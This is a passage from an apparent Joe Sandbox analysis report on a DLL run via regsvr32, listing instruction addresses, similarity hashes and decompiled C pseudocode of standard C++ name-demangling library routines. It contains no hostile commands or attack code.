                                                                      0x1800315f1
                                                                      0x1800315f6
                                                                      0x1800315fe
                                                                      0x180031603
                                                                      0x18003160d
                                                                      0x180031612
                                                                      0x18003161a
                                                                      0x18003161f
                                                                      0x180031627
                                                                      0x18003162c
                                                                      0x180031631
                                                                      0x180031634
                                                                      0x18003163a
                                                                      0x180031643
                                                                      0x180031648
                                                                      0x18003164d
                                                                      0x180031652
                                                                      0x180031657
                                                                      0x18003165c
                                                                      0x180031662
                                                                      0x180031669
                                                                      0x180031670
                                                                      0x180031679
                                                                      0x18003167e
                                                                      0x180031682
                                                                      0x18003168b
                                                                      0x180031690
                                                                      0x180031697
                                                                      0x18003169f
                                                                      0x1800316a3
                                                                      0x1800316b9
                                                                      0x1800316bb
                                                                      0x1800316be
                                                                      0x1800316c3
                                                                      0x1800316c9
                                                                      0x1800316d5
                                                                      0x1800316de
                                                                      0x1800316e4
                                                                      0x1800316e8
                                                                      0x1800316f0
                                                                      0x1800316f4
                                                                      0x1800316f9
                                                                      0x180031705
                                                                      0x18003170a
                                                                      0x18003170d
                                                                      0x18003170f
                                                                      0x180031712
                                                                      0x180031716
                                                                      0x180031718
                                                                      0x180031722
                                                                      0x18003172a
                                                                      0x18003172f
                                                                      0x180031734
                                                                      0x18003173a
                                                                      0x18003173d
                                                                      0x180031742
                                                                      0x18003174c
                                                                      0x180031758
                                                                      0x180031761
                                                                      0x180031767
                                                                      0x18003176b
                                                                      0x180031773
                                                                      0x180031777
                                                                      0x18003177c
                                                                      0x180031788
                                                                      0x180031790
                                                                      0x180031792
                                                                      0x180031795
                                                                      0x180031799
                                                                      0x18003179b
                                                                      0x1800317a5
                                                                      0x1800317ae
                                                                      0x1800317ba
                                                                      0x1800317c3
                                                                      0x1800317c9
                                                                      0x1800317cd
                                                                      0x1800317d5
                                                                      0x1800317d9
                                                                      0x1800317de
                                                                      0x1800317ea
                                                                      0x1800317ef
                                                                      0x1800317f2
                                                                      0x1800317f4
                                                                      0x1800317f7
                                                                      0x1800317fb
                                                                      0x180031807
                                                                      0x180031810
                                                                      0x18003181c
                                                                      0x180031821
                                                                      0x180031828
                                                                      0x180031830
                                                                      0x180031835
                                                                      0x18003183a
                                                                      0x18003183f
                                                                      0x180031844
                                                                      0x18003184e
                                                                      0x180031853
                                                                      0x18003185a
                                                                      0x18003186b
                                                                      0x180031871
                                                                      0x180031874
                                                                      0x180031876
                                                                      0x180031879
                                                                      0x18003187d
                                                                      0x180031882
                                                                      0x18003188a
                                                                      0x18003189b
                                                                      0x1800318a1
                                                                      0x1800318a3
                                                                      0x1800318ad
                                                                      0x1800318b4
                                                                      0x1800318ba
                                                                      0x1800318bd
                                                                      0x1800318bf
                                                                      0x1800318c8
                                                                      0x1800318cd
                                                                      0x1800318dc
                                                                      0x1800318e8
                                                                      0x1800318ed
                                                                      0x1800318f8
                                                                      0x180031900
                                                                      0x180031905
                                                                      0x18003190a
                                                                      0x18003190f
                                                                      0x180031911
                                                                      0x180031915
                                                                      0x180031919
                                                                      0x18003191c
                                                                      0x180031925
                                                                      0x18003192c
                                                                      0x180031935
                                                                      0x18003193e
                                                                      0x180031945
                                                                      0x18003194d
                                                                      0x180031955
                                                                      0x18003195a
                                                                      0x18003196a
                                                                      0x18003196f
                                                                      0x1800319a6

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Name::operator+
                                                                      • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$nullptr
                                                                      • API String ID: 2943138195-2309034085
                                                                      • Opcode ID: 26413c50f5fde908967b3adf2c2cdcc5621c220e92442e0f2f7b8a392fc99bde
                                                                      • Instruction ID: 0dd46764acb33b265e12833b44c6208d285d158f891bd1b831d1f433c4041fdf
                                                                      • Opcode Fuzzy Hash: 26413c50f5fde908967b3adf2c2cdcc5621c220e92442e0f2f7b8a392fc99bde
                                                                      • Instruction Fuzzy Hash: 7FE19232A146489CFBD79BA4C9653FE27B0A70D7C5F56C116FA0A16AA9CF34874CC341
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 70%
                                                                      			E0000000118002F2A4(void* __ebx, void* __edx, long long __rbx, long long* __rcx, long long __rdi, long long __rsi) {
                                                                      				void* _t62;
                                                                      				void* _t65;
                                                                      				intOrPtr _t74;
                                                                      				intOrPtr _t75;
                                                                      				void* _t77;
                                                                      				intOrPtr _t82;
                                                                      				void* _t88;
                                                                      				void* _t91;
                                                                      				void* _t104;
                                                                      				signed long long _t105;
                                                                      				intOrPtr* _t107;
                                                                      				long long _t108;
                                                                      				intOrPtr* _t110;
                                                                      				intOrPtr* _t113;
                                                                      				long long _t118;
                                                                      				intOrPtr _t124;
                                                                      				long long _t125;
                                                                      				long long _t127;
                                                                      				intOrPtr _t130;
                                                                      				intOrPtr* _t132;
                                                                      				intOrPtr* _t134;
                                                                      				intOrPtr* _t137;
                                                                      				signed long long _t159;
                                                                      				intOrPtr* _t163;
                                                                      				void* _t165;
                                                                      				void* _t166;
                                                                      				void* _t168;
                                                                      				char* _t174;
                                                                      				intOrPtr* _t175;
                                                                      				intOrPtr* _t176;
                                                                      				char* _t177;
                                                                      				void* _t180;
                                                                      				long long* _t181;
                                                                      				void* _t183;
                                                                      
                                                                      				_t162 = __rsi;
                                                                      				_t160 = __rdi;
                                                                      				_t104 = _t168;
                                                                      				 *((long long*)(_t104 + 0x10)) = __rbx;
                                                                      				 *((long long*)(_t104 + 0x18)) = __rsi;
                                                                      				 *((long long*)(_t104 + 0x20)) = __rdi;
                                                                      				_t166 = _t104 - 0x5f;
                                                                      				_t105 =  *0x80072078; // 0xc949cbcab002
                                                                      				 *(_t166 + 0x37) = _t105 ^ _t168 - 0x00000090;
                                                                      				_t174 =  *0x800738a8; // 0x0
                                                                      				r10b = r8b;
                                                                      				sil = __edx;
                                                                      				_t181 = __rcx;
                                                                      				r8d =  *_t174;
                                                                      				r8d = r8d + 0xffffffd0;
                                                                      				if (r8d - 9 > 0) goto 0x8002f30d;
                                                                      				_t175 = _t174 + 1;
                                                                      				_t130 =  *0x80073898; // 0x0
                                                                      				 *0x800738a8 = _t175;
                                                                      				E0000000118002EF34(_t130, __rcx);
                                                                      				goto 0x8002f55d;
                                                                      				r15d = 0;
                                                                      				if ( *_t175 != 0x3f) goto 0x8002f36b;
                                                                      				E00000001180030F6C(__ebx, _t65, 0, _t77, __rbx, _t166 - 0x29, __rcx, __rdi, __rsi);
                                                                      				_t107 =  *0x800738a8; // 0x0
                                                                      				_t108 = _t107 + 1;
                                                                      				 *0x800738a8 = _t108;
                                                                      				if ( *_t107 == 0x40) goto 0x8002f517;
                                                                      				 *0x800738a8 = _t108 - 1;
                                                                      				asm("sbb edi, edi");
                                                                      				_t123 =  !=  ? _t183 : 0x8005fee0;
                                                                      				goto 0x8002f517;
                                                                      				_t110 = "template-parameter-";
                                                                      				_t132 = _t175;
                                                                      				r8d = 0x12;
                                                                      				r11d = r11d | 0xffffffff;
                                                                      				_t74 =  *_t132;
                                                                      				if (_t74 == 0) goto 0x8002f394;
                                                                      				_t88 = _t74 -  *_t110;
                                                                      				if (_t88 != 0) goto 0x8002f394;
                                                                      				r8d = r8d + r11d;
                                                                      				if (_t88 != 0) goto 0x8002f37f;
                                                                      				if (( *(_t132 + 1) & 0x000000ff) != ( *(_t110 + 1) & 0x000000ff)) goto 0x8002f3b2;
                                                                      				 *((intOrPtr*)(_t166 - 0x21)) = 0x14;
                                                                      				_t176 = _t175 + 0x13;
                                                                      				goto 0x8002f3f7;
                                                                      				_t113 = "generic-type-";
                                                                      				_t134 = _t176;
                                                                      				r8d = 0xc;
                                                                      				_t75 =  *_t134;
                                                                      				if (_t75 == 0) goto 0x8002f3d7;
                                                                      				_t91 = _t75 -  *_t113;
                                                                      				if (_t91 != 0) goto 0x8002f3d7;
                                                                      				r8d = r8d + r11d;
                                                                      				if (_t91 != 0) goto 0x8002f3c2;
                                                                      				if (( *(_t134 + 1) & 0x000000ff) != ( *(_t113 + 1) & 0x000000ff)) goto 0x8002f4e1;
                                                                      				 *((intOrPtr*)(_t166 - 0x21)) = 0xe;
                                                                      				_t177 = _t176 + 0xd;
                                                                      				 *((long long*)(_t166 - 0x29)) = "`generic-type-";
                                                                      				asm("movaps xmm0, [ebp-0x29]");
                                                                      				asm("movdqa [ebp-0x9], xmm0");
                                                                      				 *0x800738a8 = _t177;
                                                                      				E000000011800305E4( !=  ? _t183 : 0x8005fee0, _t166 - 0x29);
                                                                      				if (( *0x800738b8 & 0x00004000) == 0) goto 0x8002f4be;
                                                                      				_t124 =  *0x800738c0; // 0x0
                                                                      				if (_t124 == 0) goto 0x8002f4be;
                                                                      				_t137 =  *((intOrPtr*)(_t166 - 0x29));
                                                                      				if (_t137 == 0) goto 0x8002f45e;
                                                                      				 *0x8007a008();
                                                                      				 *((intOrPtr*)( *((intOrPtr*)( *_t137 + 0x18)))) = r15b;
                                                                      				_t125 =  *0x800738c0; // 0x0
                                                                      				goto 0x8002f462;
                                                                      				 *((intOrPtr*)(_t166 + 0x27)) = r15b;
                                                                      				E0000000118002B014( *((intOrPtr*)( *_t137 + 0x18)), _t125, _t166 + 0x27, _t160, _t183, _t180);
                                                                      				_t118 = _t125;
                                                                      				 *0x8007a008();
                                                                      				if (_t118 == 0) goto 0x8002f48f;
                                                                      				r8b = r15b;
                                                                      				E00000001180036344(_t166 - 0x29, _t118);
                                                                      				goto 0x8002f511;
                                                                      				E0000000118002E4E4(_t166 + 0x17, _t166 - 9);
                                                                      				E0000000118002E98C(_t118, _t166 - 9, _t166 - 0x29);
                                                                      				r8b = 0x27;
                                                                      				E0000000118002E9B8(_t166 - 9, _t166 + 7);
                                                                      				goto 0x8002f511;
                                                                      				E0000000118002E4E4(_t166 + 7, _t166 - 9);
                                                                      				E0000000118002E98C(_t118, _t166 - 9, _t166 - 0x29);
                                                                      				goto 0x8002f4b0;
                                                                      				if (r10b == 0) goto 0x8002f4fe;
                                                                      				if ( *_t177 != 0x40) goto 0x8002f4fe;
                                                                      				 *0x800738a8 = _t177 + 1;
                                                                      				goto 0x8002f517;
                                                                      				r8b = 0x40;
                                                                      				E0000000118002E510(_t118, _t183, _t166 + 7, 0x800738a8, _t162, _t165);
                                                                      				_t127 =  *_t118;
                                                                      				_t82 =  *((intOrPtr*)(_t118 + 8));
                                                                      				if (sil == 0) goto 0x8002f556;
                                                                      				_t163 =  *0x80073898; // 0x0
                                                                      				if ( *_t163 == 9) goto 0x8002f556;
                                                                      				if (_t127 == 0) goto 0x8002f556;
                                                                      				_t62 = E0000000118002E384(_t118, _t127, 0x800738d0, 0x800738a8, _t163);
                                                                      				if (_t118 == 0) goto 0x8002f556;
                                                                      				 *_t118 = _t127;
                                                                      				 *((intOrPtr*)(_t118 + 8)) = _t82;
                                                                      				_t159 =  *_t163;
                                                                      				 *_t163 = _t159 + 1;
                                                                      				 *((long long*)(_t163 + 0x10 + _t159 * 8)) = _t118;
                                                                      				 *_t181 = _t127;
                                                                      				 *((intOrPtr*)(_t181 + 8)) = _t82;
                                                                      				return E00000001180002FB0(_t62, _t159 + 1,  *(_t166 + 0x37) ^ _t168 - 0x00000090);
                                                                      			}





































                                                                      0x18002f2a4
                                                                      0x18002f2a4
                                                                      0x18002f2a4
                                                                      0x18002f2a7
                                                                      0x18002f2ab
                                                                      0x18002f2af
                                                                      0x18002f2b8
                                                                      0x18002f2c3
                                                                      0x18002f2cd
                                                                      0x18002f2d1
                                                                      0x18002f2d8
                                                                      0x18002f2db
                                                                      0x18002f2de
                                                                      0x18002f2e1
                                                                      0x18002f2e5
                                                                      0x18002f2ed
                                                                      0x18002f2ef
                                                                      0x18002f2f5
                                                                      0x18002f2fc
                                                                      0x18002f303
                                                                      0x18002f308
                                                                      0x18002f30d
                                                                      0x18002f314
                                                                      0x18002f31c
                                                                      0x18002f327
                                                                      0x18002f330
                                                                      0x18002f333
                                                                      0x18002f33d
                                                                      0x18002f34d
                                                                      0x18002f35a
                                                                      0x18002f362
                                                                      0x18002f366
                                                                      0x18002f36b
                                                                      0x18002f372
                                                                      0x18002f375
                                                                      0x18002f37b
                                                                      0x18002f37f
                                                                      0x18002f383
                                                                      0x18002f385
                                                                      0x18002f387
                                                                      0x18002f38f
                                                                      0x18002f392
                                                                      0x18002f39c
                                                                      0x18002f3a5
                                                                      0x18002f3ac
                                                                      0x18002f3b0
                                                                      0x18002f3b2
                                                                      0x18002f3b9
                                                                      0x18002f3bc
                                                                      0x18002f3c2
                                                                      0x18002f3c6
                                                                      0x18002f3c8
                                                                      0x18002f3ca
                                                                      0x18002f3d2
                                                                      0x18002f3d5
                                                                      0x18002f3df
                                                                      0x18002f3ec
                                                                      0x18002f3f3
                                                                      0x18002f3f7
                                                                      0x18002f3ff
                                                                      0x18002f403
                                                                      0x18002f408
                                                                      0x18002f40f
                                                                      0x18002f41e
                                                                      0x18002f424
                                                                      0x18002f42e
                                                                      0x18002f434
                                                                      0x18002f43b
                                                                      0x18002f44c
                                                                      0x18002f452
                                                                      0x18002f455
                                                                      0x18002f45c
                                                                      0x18002f45e
                                                                      0x18002f466
                                                                      0x18002f46d
                                                                      0x18002f470
                                                                      0x18002f479
                                                                      0x18002f47b
                                                                      0x18002f485
                                                                      0x18002f48a
                                                                      0x18002f497
                                                                      0x18002f4a7
                                                                      0x18002f4b0
                                                                      0x18002f4b7
                                                                      0x18002f4bc
                                                                      0x18002f4c6
                                                                      0x18002f4d6
                                                                      0x18002f4df
                                                                      0x18002f4e4
                                                                      0x18002f4ea
                                                                      0x18002f4f2
                                                                      0x18002f4fc
                                                                      0x18002f4fe
                                                                      0x18002f50c
                                                                      0x18002f511
                                                                      0x18002f514
                                                                      0x18002f51a
                                                                      0x18002f51c
                                                                      0x18002f526
                                                                      0x18002f52b
                                                                      0x18002f539
                                                                      0x18002f541
                                                                      0x18002f543
                                                                      0x18002f546
                                                                      0x18002f549
                                                                      0x18002f54f
                                                                      0x18002f551
                                                                      0x18002f556
                                                                      0x18002f559
                                                                      0x18002f588

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Replicator::operator[]
                                                                      • String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
                                                                      • API String ID: 3676697650-3207858774
                                                                      • Opcode ID: 2c404a21cea03ac33547bffe2530cce5f3e1842f404191e7adf49a1010df5251
                                                                      • Instruction ID: 24e1e7b7d5edd086b88f08665fda24ef3b6c1ebaf44f7b2a06941d875985cc27
                                                                      • Opcode Fuzzy Hash: 2c404a21cea03ac33547bffe2530cce5f3e1842f404191e7adf49a1010df5251
                                                                      • Instruction Fuzzy Hash: 76916932600A8899FBA3DB24D4503E937A1A75DBC8F98C022EA4D037A9DF39C749C750
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 77%
                                                                      			E00000001180034550(void* __ebx, void* __ecx, void* __edx, long long __rbx, long long* __rcx, long long __rdi, void* __rsi, void* __r8, long long __r9, void* __r12, void* __r14, long long _a8, long long _a24) {
                                                                      				void* _v8;
                                                                      				char _v24;
                                                                      				char _v56;
                                                                      				intOrPtr _v64;
                                                                      				void* _v72;
                                                                      				intOrPtr _t28;
                                                                      				void* _t30;
                                                                      				void* _t33;
                                                                      				char* _t46;
                                                                      				long long* _t48;
                                                                      				long long* _t52;
                                                                      				void* _t59;
                                                                      
                                                                      				_t59 = __r8;
                                                                      				_t38 = __rbx;
                                                                      				_t30 = __ecx;
                                                                      				_a8 = __rbx;
                                                                      				_a24 = __rdi;
                                                                      				_t46 =  *0x800738a8; // 0x0
                                                                      				r9d = 0;
                                                                      				_t52 = __rcx;
                                                                      				r8d =  *_t46;
                                                                      				if (r8b != 0) goto 0x800345b3;
                                                                      				_t35 = "`unknown ecsu\'";
                                                                      				_v64 = 0xe;
                                                                      				_v72 = "`unknown ecsu\'";
                                                                      				asm("movaps xmm0, [ebp-0x40]");
                                                                      				asm("movdqa [ebp-0x30], xmm0");
                                                                      				E0000000118002E4E4( &_v72,  &_v56);
                                                                      				r8d = 1;
                                                                      				_t48 = __rcx;
                                                                      				E0000000118002EA10("`unknown ecsu\'", __rcx);
                                                                      				goto 0x8003460d;
                                                                      				_v72 = __r9;
                                                                      				_v64 = r9d;
                                                                      				_t33 = r8b - 0x57;
                                                                      				if (_t33 != 0) goto 0x80034622;
                                                                      				if (_t33 != 0) goto 0x80034639;
                                                                      				 *0x800738a8 = _t48 + 1;
                                                                      				if (r8b != 0x57) goto 0x800345ea;
                                                                      				E00000001180032E58(__rbx,  &_v24);
                                                                      				E00000001180030434(__ebx, _t30, r8b - 0x57, _t35, _t38,  &_v56, _t48 + 1, _t52, __rsi, _t59, __r12, __r14);
                                                                      				E0000000118002EC28(_t30,  &_v72,  &_v56, _t59);
                                                                      				 *_t52 = _v72;
                                                                      				_t28 = _v64;
                                                                      				 *((intOrPtr*)(_t52 + 8)) = _t28;
                                                                      				return _t28;
                                                                      			}















                                                                      0x180034550
                                                                      0x180034550
                                                                      0x180034550
                                                                      0x180034550
                                                                      0x180034555
                                                                      0x180034562
                                                                      0x180034569
                                                                      0x18003456c
                                                                      0x18003456f
                                                                      0x180034576
                                                                      0x180034578
                                                                      0x18003457f
                                                                      0x180034586
                                                                      0x18003458e
                                                                      0x180034596
                                                                      0x18003459b
                                                                      0x1800345a0
                                                                      0x1800345a6
                                                                      0x1800345ac
                                                                      0x1800345b1
                                                                      0x1800345b3
                                                                      0x1800345b7
                                                                      0x1800345bb
                                                                      0x1800345bf
                                                                      0x1800345cf
                                                                      0x1800345d4
                                                                      0x1800345df
                                                                      0x1800345e5
                                                                      0x1800345ee
                                                                      0x1800345fb
                                                                      0x180034604
                                                                      0x180034607
                                                                      0x18003460a
                                                                      0x180034621

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Name::operator+$Name::operator+=
                                                                      • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
                                                                      • API String ID: 179159573-1464470183
                                                                      • Opcode ID: 7be212a359382192892f5eb8faca373aa8e36a783ab5255464fc1330b8602896
                                                                      • Instruction ID: 92d50f6b235f40819367c6cc910a5e19a18d9a420ff8f40af66f846b06d17935
                                                                      • Opcode Fuzzy Hash: 7be212a359382192892f5eb8faca373aa8e36a783ab5255464fc1330b8602896
                                                                      • Instruction Fuzzy Hash: 78515B72B10B5899FB92CBA4E8817ED37B0B7193C8F518019FE096BA99DF35D649C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 74%
                                                                      			E00000001180034AD4(void* __ecx, long long __rbx, long long* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi, void* __r8, void* __r10, void* __r11, long long _a8, long long _a16, long long _a24) {
                                                                      				void* _v24;
                                                                      				char _v40;
                                                                      				char _v56;
                                                                      				char _v72;
                                                                      				intOrPtr _v80;
                                                                      				char _v88;
                                                                      				intOrPtr _v96;
                                                                      				char _v104;
                                                                      				char _v112;
                                                                      				char _v120;
                                                                      				void* __r14;
                                                                      				void* __r15;
                                                                      				void* _t66;
                                                                      				void* _t96;
                                                                      				intOrPtr* _t104;
                                                                      				intOrPtr* _t106;
                                                                      				intOrPtr* _t144;
                                                                      				intOrPtr* _t153;
                                                                      				long long* _t156;
                                                                      				void* _t171;
                                                                      				long long _t172;
                                                                      
                                                                      				_t110 = __rbx;
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rsi;
                                                                      				_a24 = __rdi;
                                                                      				_t104 =  *0x800738a8; // 0x0
                                                                      				r15d = 0;
                                                                      				_t153 = __rdx;
                                                                      				_t156 = __rcx;
                                                                      				if ( *_t104 == r15b) goto 0x80034c4f;
                                                                      				_t66 = E00000001180030EF8(__rdx);
                                                                      				r14d = _t66;
                                                                      				_t96 = _t66;
                                                                      				if (_t96 < 0) goto 0x80034cbb;
                                                                      				if (_t96 == 0) goto 0x80034cbb;
                                                                      				_v120 = _t172;
                                                                      				_v112 = r15d;
                                                                      				if (( *(__rdx + 8) & 0x00000800) == 0) goto 0x80034b5c;
                                                                      				_v96 = 2;
                                                                      				_v104 = 0x80066548;
                                                                      				asm("movaps xmm0, [ebp-0x50]");
                                                                      				asm("movdqa [ebp-0x50], xmm0");
                                                                      				E0000000118002EAA8(0x80066548, __rbx,  &_v120,  &_v104);
                                                                      				goto 0x80034bbf;
                                                                      				r14d = r14d - 1;
                                                                      				if (r14d == 0) goto 0x80034bc5;
                                                                      				_t106 =  *0x800738a8; // 0x0
                                                                      				if ( *_t106 == r15b) goto 0x80034bc5;
                                                                      				E0000000118003066C(__ecx, 0, _t110,  &_v56, _t153, _t156, __r10, __r11, _t171);
                                                                      				_v104 = _t172;
                                                                      				_v96 = r15d;
                                                                      				_t111 = _t106;
                                                                      				E0000000118002EE78(0x5b, _t106, _t106,  &_v104);
                                                                      				E0000000118002E98C( &_v104,  &_v72, _t111);
                                                                      				r8b = 0x5d;
                                                                      				E0000000118002E9B8( &_v72,  &_v40);
                                                                      				E0000000118002EC28(__ecx,  &_v120, _t106, _t111);
                                                                      				if (_v112 - 1 <= 0) goto 0x80034b5c;
                                                                      				if ( *_t153 == _t172) goto 0x80034c2c;
                                                                      				if (( *(_t153 + 8) & 0x00000800) == 0) goto 0x80034bdc;
                                                                      				goto 0x80034c16;
                                                                      				_v104 = _t172;
                                                                      				_v96 = r15d;
                                                                      				E0000000118002EE78(0x28, _t106, _t111,  &_v104);
                                                                      				E0000000118002E98C( &_v104,  &_v72, _t153);
                                                                      				r8b = 0x29;
                                                                      				E0000000118002E9B8( &_v72,  &_v40);
                                                                      				E0000000118002E98C(_t106,  &_v56,  &_v120);
                                                                      				_v120 =  *_t106;
                                                                      				_v112 =  *((intOrPtr*)(_t106 + 8));
                                                                      				_t144 =  &_v120;
                                                                      				E00000001180033210(_t111,  &_v88, _t144, _t153,  &_v120);
                                                                      				asm("bts ecx, 0xb");
                                                                      				 *((intOrPtr*)(_t156 + 8)) = _v80;
                                                                      				 *_t156 = _v88;
                                                                      				goto 0x80034cfb;
                                                                      				if ( *_t144 == _t172) goto 0x80034cbb;
                                                                      				_t108 = ")[";
                                                                      				_v80 = 2;
                                                                      				_v88 = ")[";
                                                                      				asm("movaps xmm0, [ebp-0x40]");
                                                                      				asm("movdqa [ebp-0x30], xmm0");
                                                                      				_v104 = _t172;
                                                                      				_v96 = r15d;
                                                                      				E0000000118002EE78(0x28, ")[", _t111,  &_v104);
                                                                      				E0000000118002E98C( &_v104,  &_v88, _t153);
                                                                      				E0000000118002E960( &_v88,  &_v40,  &_v72);
                                                                      				r8d = 1;
                                                                      				E0000000118002EA10(_t108,  &_v56);
                                                                      				goto 0x80034ce5;
                                                                      				_v104 = _t172;
                                                                      				_v96 = r15d;
                                                                      				E0000000118002EE78(0x5b, _t108, _t111,  &_v104);
                                                                      				r8d = 1;
                                                                      				E0000000118002EA10( &_v104,  &_v40);
                                                                      				r8b = 0x5d;
                                                                      				E0000000118002E9B8(_t108,  &_v56);
                                                                      				return E00000001180033FA0(_t111, _t156, _t108, _t153, _t171, _t172);
                                                                      			}
























                                                                      0x180034ad4
                                                                      0x180034ad4
                                                                      0x180034ad9
                                                                      0x180034ade
                                                                      0x180034af2
                                                                      0x180034af9
                                                                      0x180034afc
                                                                      0x180034aff
                                                                      0x180034b05
                                                                      0x180034b0b
                                                                      0x180034b10
                                                                      0x180034b13
                                                                      0x180034b15
                                                                      0x180034b1b
                                                                      0x180034b28
                                                                      0x180034b2c
                                                                      0x180034b30
                                                                      0x180034b32
                                                                      0x180034b40
                                                                      0x180034b48
                                                                      0x180034b50
                                                                      0x180034b55
                                                                      0x180034b5a
                                                                      0x180034b5f
                                                                      0x180034b64
                                                                      0x180034b66
                                                                      0x180034b70
                                                                      0x180034b78
                                                                      0x180034b7f
                                                                      0x180034b87
                                                                      0x180034b8b
                                                                      0x180034b8e
                                                                      0x180034b9e
                                                                      0x180034ba3
                                                                      0x180034bae
                                                                      0x180034bba
                                                                      0x180034bc3
                                                                      0x180034bc8
                                                                      0x180034bd1
                                                                      0x180034bda
                                                                      0x180034bde
                                                                      0x180034be6
                                                                      0x180034bea
                                                                      0x180034bfa
                                                                      0x180034bff
                                                                      0x180034c0a
                                                                      0x180034c1a
                                                                      0x180034c22
                                                                      0x180034c29
                                                                      0x180034c2c
                                                                      0x180034c34
                                                                      0x180034c40
                                                                      0x180034c44
                                                                      0x180034c47
                                                                      0x180034c4a
                                                                      0x180034c52
                                                                      0x180034c54
                                                                      0x180034c5b
                                                                      0x180034c62
                                                                      0x180034c6a
                                                                      0x180034c70
                                                                      0x180034c75
                                                                      0x180034c79
                                                                      0x180034c7d
                                                                      0x180034c8d
                                                                      0x180034c9e
                                                                      0x180034ca3
                                                                      0x180034cb0
                                                                      0x180034cb9
                                                                      0x180034cbd
                                                                      0x180034cc5
                                                                      0x180034cc9
                                                                      0x180034cce
                                                                      0x180034cdc
                                                                      0x180034ce5
                                                                      0x180034ceb
                                                                      0x180034d1a

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Name::operator+
                                                                      • String ID:
                                                                      • API String ID: 2943138195-0
                                                                      • Opcode ID: 45fa153486aca0a1ef7334db0d07118bae86c782db781929b14b054c5da0e80c
                                                                      • Instruction ID: 110e142a5801abad952d37679e3828e764edee0828b33a0d62fb380421d96f44
                                                                      • Opcode Fuzzy Hash: 45fa153486aca0a1ef7334db0d07118bae86c782db781929b14b054c5da0e80c
                                                                      • Instruction Fuzzy Hash: E1615B72B10BA898FB82DBA0D8813DD77B1B709788F418416EE4D6BA99DF74C649C340
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 60%
                                                                      			E0000000118002BE48(signed short* __rax, long long __rbx, long long __rcx, signed short** __rdx, void* __r8, long long _a8, intOrPtr _a16, long long _a24) {
                                                                      				void* _v64;
